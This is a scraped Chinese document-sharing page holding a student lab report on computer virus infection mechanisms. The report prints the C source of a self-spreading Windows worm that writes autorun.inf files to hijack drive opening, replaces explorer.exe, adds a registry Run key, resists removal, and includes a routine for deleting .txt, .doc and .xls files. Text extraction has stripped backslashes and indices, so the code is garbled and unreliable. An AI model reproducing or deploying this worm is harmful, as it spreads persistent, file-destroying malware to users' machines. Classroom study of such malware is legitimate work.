




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
1、計算機(jī)病毒原理實(shí)驗(yàn)報告專業(yè):信息安全班級:0903班姓名:學(xué)號:時間:2012年1月3日計算機(jī)病毒的傳染機(jī)制:1 計算機(jī)病毒的傳染方式 所謂傳染是指計算機(jī)病毒由一個載體傳播到另一個載體,由一個系統(tǒng)進(jìn)入另一個系統(tǒng)的過程。這種載體一般為磁盤或磁帶,它是計算機(jī)病毒賴以生存和進(jìn)行傳染的媒介。但是,只有載體還不足以使病毒得到傳播。促成病毒的傳染還有一個先決條件,可分為兩種情況,或者叫做兩種方式。 其中一種情況是,用戶在進(jìn)行拷貝磁盤或文件時,把一個病毒由一個載體復(fù)制到另一個載體上?;蛘呤峭ㄟ^網(wǎng)絡(luò)上的信息傳遞,把一個病毒程序從一方傳遞到另一方。這種傳染方式叫做計算機(jī)病毒的被動傳染。 另外一種情況是,計算機(jī)病
2、毒是以計算機(jī)系統(tǒng)的運(yùn)行以及病毒程序處于激活狀態(tài)為先決條件。在病毒處于激活的狀態(tài)下,只要傳染條件滿足,病毒程序能主動地把病毒自身傳染給另一個載體或另一個系統(tǒng)。這種傳染方式叫做計算機(jī)病毒的主動傳染。 2 計算機(jī)病毒的傳染過程 對于病毒的被動傳染而言,其傳染過程是隨著拷貝磁盤或文件工作的進(jìn)行而進(jìn)行的,而對于計算機(jī)病毒的主動傳染而言,其傳染過程是這樣的:在系統(tǒng)運(yùn)行時,病毒通過病毒載體即系統(tǒng)的外存儲器進(jìn)入系統(tǒng)的內(nèi)存儲器,常駐內(nèi)存,并在系統(tǒng)內(nèi)存中監(jiān)視系統(tǒng)的運(yùn)行。在病毒引導(dǎo)模塊將病毒傳染模塊駐留內(nèi)存的過程中,通常還要修改系統(tǒng)中斷向量入口地址(例如INT 13H或INT 21H),使該中斷向量指向病毒程序傳染
3、模塊。這樣,一旦系統(tǒng)執(zhí)行磁盤讀寫操作或系統(tǒng)功能調(diào)用,病毒傳染模塊就被激活,傳染模塊在判斷傳染條件滿足的條件下, 利用系統(tǒng)INT 13H讀寫磁盤中斷把病毒自身傳染給被讀寫的磁盤或被加載的程序,也就是實(shí)施病毒的傳染,然后再轉(zhuǎn)移到原中斷服務(wù)程序執(zhí)行原有的操作。 計算機(jī)病毒的傳染方式基本可分為兩大類,一是立即傳染,即病毒在被執(zhí)行到的瞬間,搶在宿主程序開始執(zhí)行前,立即感染磁盤上的其他程序,然后再執(zhí)行宿主程序;二是駐留內(nèi)存并伺機(jī)傳染,內(nèi)存中的病毒檢查當(dāng)前系統(tǒng)環(huán)境,在執(zhí)行一個程序或D1R等操作時傳染磁盤上的程序,駐留在系統(tǒng)內(nèi)存中的病毒程序在宿主程序運(yùn)行結(jié)束后, 仍可活動,直至關(guān)閉計算機(jī)。 3 系統(tǒng)型病毒傳染
4、機(jī)理 計算機(jī)軟硬盤的配置和使用情況是不同的。軟盤容量小,可以方便地移動交換使用,在計算機(jī)運(yùn)行過程中可能多次更換軟盤;硬盤作為固定設(shè)備安裝在計算機(jī)內(nèi)部使用,大多數(shù)計算機(jī)配備一只硬盤。系統(tǒng)型病毒針對軟硬盤的不同特點(diǎn)采用了不同的傳染方式。系統(tǒng)型病毒利用在開機(jī)引導(dǎo)時竊獲的INT 13控制權(quán),在整個計算機(jī)運(yùn)行過程中隨時監(jiān)視軟盤操作情況, 趁讀寫軟盤的時機(jī)讀出軟盤引導(dǎo)區(qū),判斷軟盤是否染毒,如未感染就按病毒的寄生方式把原引導(dǎo)區(qū)寫到軟盤另一位置,把病毒寫入軟盤第一個扇區(qū),從而完成對軟盤的傳染。染毒的軟盤在軟件交流中又會傳染其他計算機(jī)。由于在每個讀寫階段病毒都要讀引導(dǎo)區(qū),既影響微機(jī)工作效率,又容易因驅(qū)動器頻繁尋
5、道而造成物理損傷。系統(tǒng)型病毒對硬盤的傳染往往是在計算機(jī)上第一次使用帶毒軟盤進(jìn)行的,具體步驟與軟盤傳染相似,也是讀出引導(dǎo)區(qū)判斷后寫入病毒。 4 文件型病毒傳染機(jī)理 當(dāng)執(zhí)行被傳染的.COM或.EXE可執(zhí)行文件時,病毒駐人內(nèi)存。一旦病毒駐人內(nèi)存,便開始監(jiān)視系統(tǒng)的運(yùn)行。當(dāng)它發(fā)現(xiàn)被傳染的目標(biāo)時,進(jìn)行如下操作: (1)首先對運(yùn)行的可執(zhí)行文件特定地址的標(biāo)識位信息進(jìn)行判斷是否已感染了病毒; (2)當(dāng)條件滿足,利用INT 13H將病毒鏈接到可執(zhí)行文件的首部或尾部或中間,并存入磁盤中; (3)完成傳染后,繼續(xù)監(jiān)視系統(tǒng)的運(yùn)行,試圖尋找新的攻擊目標(biāo)。文件型病毒通過與磁盤文件有關(guān)的操作進(jìn)行傳染,主要傳染途徑有: (1)
6、加載執(zhí)行文件 文件型病毒駐內(nèi)存后,通過其所截獲的INT 21中斷檢查每一個加載運(yùn)行可執(zhí)行文件進(jìn)行 傳染。加載傳染方式每次傳染一個文件,即用戶準(zhǔn)備運(yùn)行的那個文件,傳染不到那些用戶沒有使用的文件。 (2)列目錄過程 一些病毒編制者可能感到加載傳染方式每次傳染一個文件速度較慢,不夠過癮,于是后來造出通過列目錄傳染的病毒。 在用戶列硬盤目錄的時候,病毒檢查每一個文件的擴(kuò)展名,如果是可執(zhí)行文件就調(diào)用病毒的傳染模塊進(jìn)行傳染。 這樣病毒可以一次傳染硬盤一個于目錄下的全部可執(zhí)行文件。DIR是最常用的DOS命令,每次傳染的文件又多,所以病毒的擴(kuò)散速度很快,往往在短時間內(nèi)傳遍整個硬盤。 對于軟盤而言,由于讀寫速度
7、比硬盤慢得多,如果一次傳染多個文件所費(fèi)時間較長,容易被用戶發(fā)現(xiàn),所以病毒“忍痛”放棄了一些傳染機(jī)會,采用列一次目錄只傳染一個文件的方式。 (3)創(chuàng)建文件過程 創(chuàng)建文件是DOS內(nèi)部的一項(xiàng)操作,功能是在磁盤上建立一個新文件。 已經(jīng)發(fā)現(xiàn)利用創(chuàng)建文件過程把病毒附加到新文件上去的病毒,這種傳染方式更為隱蔽狡猾。因?yàn)榧虞d傳染和列目錄傳染都是病毒感染磁盤上原有的文件,細(xì)心的用戶往往會發(fā)現(xiàn)文件染毒前后長度的變化,從而暴露病毒的蹤跡。而創(chuàng)建文件的傳染手段卻造成了新文件生來帶毒的奇觀。好在一般用戶很少去創(chuàng)建一個可執(zhí)行文件,但經(jīng)常使用各種編譯、連接工具的計算機(jī)專業(yè)工作者應(yīng)該注意文件型病毒發(fā)展的這一動向,特別在商品軟
8、件最后生成階段嚴(yán)防此類病毒。實(shí)驗(yàn)所用病毒介紹:本病毒所具有的功能:1.在所有磁盤的根目錄生成和autorun.inf文件2.生成病毒體:c:windowsc:windowsexplorer.exec:windowssystem32dllcacheexplorer.exec:windowssystemmsmouse.dllc:windowssystem32cmdsys.sysc:windowssystem32mstsc32.exe3.病毒體c:windowsexplorer.exe感染原explorer.exe文件,使其不需要修改注冊表做到啟動時在explorer.exe前啟動4.修改注冊表,
9、在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun設(shè)置自啟動項(xiàng)(此操作不使用windowsAPI,防止用戶對病毒體的發(fā)現(xiàn),并實(shí)現(xiàn)并行執(zhí)行)5.生成的autorun.inf改變磁盤的打開方式,使其在windows2000以上的系統(tǒng)無論選擇“打開”、“雙擊”、“資源管理器”等方式都無法打開分驅(qū),而是以運(yùn)行病毒的方式取而代之。6.連鎖能力,將病毒體相連,實(shí)現(xiàn)相連復(fù)制更新7.使用進(jìn)程不斷調(diào)用進(jìn)程,使得在任務(wù)管理里無法結(jié)束病毒進(jìn)程8.不斷搜索磁盤,只要發(fā)現(xiàn)未感染病毒的一律感染,病毒刪除后1秒內(nèi)再建9.生成垃圾文件(DESTORY_感染
10、_任意數(shù)字)5個于C盤下10.附帶刪除文件函數(shù)(為防止危害,本函數(shù)默認(rèn)不執(zhí)行)本病毒到目前為止任何殺毒軟件都無法將其查殺本病毒單機(jī)默認(rèn)使用對機(jī)器無害(破壞代碼已屏蔽)提供病毒卸載程序(保存為X.BAT,雙擊運(yùn)行即可卸載):病毒源程序:/* SVCHOST.C */* SVCHOST.EXE */* SVCHOST.COM */#include<stdio.h> /*標(biāo)準(zhǔn)輸入輸出*/ #include<string.h> /*字符串操作*/ #include<stdlib.h> /*其它函數(shù)*/ #include<process.h> /*進(jìn)程控制
11、*/#include<dir.h> /*目錄函數(shù)*/#define SVCHOST_NUM 6 /*關(guān)鍵位置病毒復(fù)制數(shù)量*/#define RUBBISH_NUM 5 /*垃圾文件數(shù)量*/#define REMOVE_NUM 5 /*刪除文件數(shù)*/ /*=*/*文件AUTORUN.INF內(nèi)容: 1.自動運(yùn)行SVCHOST.com 2.覆蓋默認(rèn)打開命令,使用病毒體作為新的打開方式 3.覆蓋默認(rèn)資源管理器命令,使病毒體作為新的命令方式*/ char *autorun="AutoRunnopen="SVCHOST.com /s"nshellopen=打開(&
12、amp;O)nshellopenCommand="SVCHOST.com /s"nshellexplore=資源管理器(&X)nshellexploreCommand="SVCHOST.com /s""/*=*/* 添加注冊表項(xiàng): 1.自動運(yùn)行生成病毒體C:windows*/char *regadd="REGEDIT4nnHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunn"wjview32"="C:windows /s"
13、;"/*=*/*函數(shù):復(fù)制文件 復(fù)制源:infile 目的地:outfile 成功返回0,失敗返回1*/ int copy(char *infile,char *outfile) FILE *input,*output; char temp; if(strcmp(infile,outfile)!=0 && (input=fopen(infile,"rb")!=NULL) && (output=fopen(outfile,"wb")!=NULL) while(!feof(input) fread(&temp
14、,1,1,input); fwrite(&temp,1,1,output); fclose(input); fclose(output); return 0; else return 1;/*=*/* 函數(shù):通過explorer自動運(yùn)行 成功返回0,失敗返回1,2*/ int autorun_explorer() FILE *input; if(input=fopen("c:windowssystemexplorer.exe","rb")!=NULL) fclose(input); remove("c:windows$temp$&quo
15、t;); remove("c:windowssystem32dllcache$temp$"); return 1; copy("c:windowsexplorer.exe","c:windowssystemexplorer.exe"); rename("c:windowsexplorer.exe","c:windows$temp$"); rename("c:windowssystem32dllcacheexplorer.exe","c:windowssystem32
16、dllcache$temp$"); if(copy("SVCHOST.com","c:windowsexplorer.exe")=0 && copy("SVCHOST.com","c:windowssystem32dllcacheexplorer.exe")=0) return 0; else return 2;/*=*/* 函數(shù):添加注冊表項(xiàng) 成功返回0,失敗返回1*/ int add_reg() FILE *output; if(output=fopen("$",&
17、quot;w")!=NULL) fprintf(output,regadd); fclose(output); spawnl(1,"c:windowsregedit.exe"," /s $",NULL); /*=*/* 函數(shù):復(fù)制病毒 + Autorun.inf自動運(yùn)行 */ void copy_virus() int i,k; FILE *input,*output; char *files_svchostSVCHOST_NUM="","c:windows","c:windowssystemM
18、SMOUSE.DLL","c:windowssystem32cmdsys.sys","c:windowssystem32mstsc32.exe","c:windowsexplorer.exe" char temp220="c:","c:autorun.inf" for(i=0;i<SVCHOST_NUM;i+) if(input=fopen(files_svchosti,"rb")!=NULL) fclose(input); for(k=0;k<SVCH
19、OST_NUM;k+) copy(files_svchosti,files_svchostk); i=SVCHOST_NUM; for(i=0;i<SVCHOST_NUM;i+) if(input=fopen(files_svchosti,"rb")!=NULL) fclose(input); for(k=0;k<24;k+) copy(files_svchosti,temp0); if(output=fopen(temp1,"w")!=NULL) fprintf(output,"%s",autorun); fclose(
20、output); temp00+; temp10+; i=SVCHOST_NUM; /*=*/* 函數(shù):制造垃圾文件 */ void make_rubbish() int i; FILE *output; srand(0); for(i=0;i<RUBBISH_NUM;i+) int n; char s30; n=rand(); sprintf(s,"C:DESTORY_感染_%d",n); if(output=fopen(s,"w")!=NULL) fprintf(output,"%ld%s",n*n,s); fclose(o
21、utput); /*=*/* 函數(shù):刪除文件*/ void remove_files() long done; int i; struct _finddata_t ffblk; char *remove_files3="*.txt","*.doc","*.xls" for(i=0;i<3;i+) if(_findfirst(remove_filesi,&ffblk)=-1) continue; while(!done) remove(); _findnext(done,&ffblk); _findclose(done); /*=*/* 主程序 使用DEV-CPP 32位C工程 實(shí)現(xiàn).C程序脫離命令行界面,于后臺執(zhí)行*/ int main(int argc,char *argv) int contral=0; if(argc>1) if(strcmp(argv1,"/s")=0) goto next1; autorun_explorer(); spawnl(1,"c:windowssystemexplorer.exe",NULL); next
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 采購專員崗位面試問題及答案
- 太空站物資管理師崗位面試問題及答案
- 湖北省十堰市張灣區(qū)東風(fēng)高中2025屆高二化學(xué)第二學(xué)期期末達(dá)標(biāo)檢測試題含解析
- 2025屆山東省煙臺市萊州市一中化學(xué)高一下期末學(xué)業(yè)水平測試試題含解析
- 供電公司計劃管理辦法
- 農(nóng)村鄉(xiāng)鎮(zhèn)街區(qū)管理辦法
- 老年護(hù)理服務(wù)優(yōu)化-洞察及研究
- 團(tuán)青志愿服務(wù)管理辦法
- 民航企業(yè)準(zhǔn)入管理辦法
- 杭州企業(yè)年金管理辦法
- 成都市郫都區(qū)七年級上學(xué)期語文期末考試試卷
- 市場營銷原理與實(shí)務(wù)形成性測試1-4答案
- 困難氣道管理指南2017
- 中學(xué)輿情應(yīng)急處置預(yù)案
- 抗震支架施工技術(shù)交底
- GB/T 4169.13-2006塑料注射模零件第13部分:復(fù)位桿
- GB/T 31301.4-2015制鞋機(jī)械安全要求第4部分:鞋類成型機(jī)
- 三基院感試題和答案
- 2023年荊州松滋市社區(qū)工作者招聘考試筆試題庫及答案解析
- 工業(yè)廢水處理工(中級工)理論試題庫匯總-下(判斷題)
- 渠道激勵方案
評論
0/150
提交評論